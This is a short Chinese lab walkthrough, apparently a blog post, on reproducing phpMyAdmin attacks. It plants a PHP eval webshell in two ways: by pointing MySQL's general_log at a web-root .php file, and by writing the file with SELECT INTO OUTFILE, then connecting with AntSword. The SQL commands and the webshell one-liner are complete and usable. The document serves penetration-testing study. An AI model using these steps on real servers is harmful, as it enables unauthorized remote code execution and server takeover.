PhPMyadmin-cms漏洞复现

一.通过日志文件拿Shell

打开靶场连接数据库

来到sql中输入

复制代码
show global variables like '%general%';
复制代码
set global general_log='on'; //⽇志保存状态开启;
复制代码
set global general_log_file = 'D:/phpstudy/phpstudy_pro/WWW/123.php'  //修改日志保存位置
复制代码
show global variables like '%general%';
复制代码
select '<?php eval($_POST[cmd]);?>';

看看是否能连接成功

二.导入导出拿webshell

输入select @@datadir我们可以看到mysql路径

所以我们推测web路径为D:/phpstudy/phpstudy_pro/WWW

复制代码
select "<?php eval($_POST[a]);?>" into outfile 'D:/phpstudy/phpstudy_pro/WWW/666.php'

去访问

再用蚁剑连接一下试试

相关推荐
heze093 小时前
sqli-labs-Less-18自动化注入方法
mysql·网络安全·自动化
heze0913 小时前
sqli-labs-Less-19自动化注入方法
mysql·网络安全·自动化
网安CILLE13 小时前
Wireshark 抓包实战演示
linux·网络·python·测试工具·web安全·网络安全·wireshark
久违 °16 小时前
【安全开发】Nmap主机探测技术详解(一)
网络·安全·网络安全
Whoami!17 小时前
❿⁄₁₄ ⟦ OSCP ⬖ 研记 ⟧ 密码攻击实践 ➱ 传递Net-NTLMv2哈希
网络安全·信息安全·密码破解·ntlm哈希
周某人姓周17 小时前
sqli-labs注入靶场搭建与sql语句
sql·安全·网络安全
吉吉6118 小时前
文件包含之伪协议漏洞复现
web安全·网络安全
Bruce_Liuxiaowei18 小时前
解决 PowerShell 模块加载无响应问题的实用指南——Invoke-Obfuscation为例
windows·网络安全·内网渗透
tangyal1 天前
渗透笔记1
笔记·网络安全·渗透
吗喽1543451881 天前
渗透高级第一次作业(笔记整理)
笔记·安全·网络安全